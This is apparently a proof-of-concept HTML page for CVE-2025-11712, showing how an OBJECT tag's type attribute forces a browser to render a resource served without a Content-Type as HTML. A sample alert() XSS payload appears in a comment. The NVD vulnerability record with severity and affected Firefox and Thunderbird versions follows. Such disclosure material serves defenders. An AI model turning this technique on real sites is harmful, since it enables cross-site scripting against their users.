CVE-2025-11712

<!-- CVE-2025-11712 PoC: OBJECT tag type attribute XSS --> <!-- This PoC demonstrates how the type attribute of an OBJECT tag can be abused --> <!-- to override browser default behavior when a resource is served without Content-Type --> <!DOCTYPE html> <html> <head> <title>CVE-2025-11712 PoC</title> </head> <body> <h1>CVE-2025-11712 - OBJECT Tag XSS via Type Attribute Override</h1> <!-- The malicious OBJECT tag uses the type attribute to force the browser to interpret the loaded resource as HTML, even when the target server does not provide a Content-Type header. The target URL should point to a resource on a vulnerable site that is served without a proper Content-Type response header. --> <object type="text/html" data="https://vulnerable-site.example.com/unsafe-file" width="600" height="400"> <!-- Fallback content --> <p>If you see this, the OBJECT failed to load.</p> </object> <!-- Alternative PoC using data attribute with a crafted payload: If the vulnerable site serves user-controlled content without Content-Type, the attacker can inject HTML/JavaScript through the OBJECT's type override. --> <object type="text/html" data="https://vulnerable-site.example.com/user-content/reflected-input"> </object> <!-- Demonstration of how the type override enables XSS: When the browser fetches the resource specified in 'data', it normally relies on the Content-Type header. However, the 'type' attribute in the OBJECT tag takes precedence, forcing the browser to render the response as HTML regardless of the actual content type. If an attacker can control part of the content at the target URL, they can inject: <script>alert('XSS via CVE-2025-11712')</script> --> <script> // Note: The actual exploitation requires the target site to serve // content without Content-Type header, and some portion of that // content must be controllable by the attacker. console.log("CVE-2025-11712 PoC loaded"); </script> </body> </html>

{"cve": {"id": "CVE-2025-11712", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.447", "lastModified": "2026-04-13T15:16:39.987", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious page could have used the type attribute of an OBJECT tag to override the default browser behavior when encountering a web resource served without a content-type. This could have contributed to an XSS on a site that unsafely serves files without a content-type header. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1979536", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}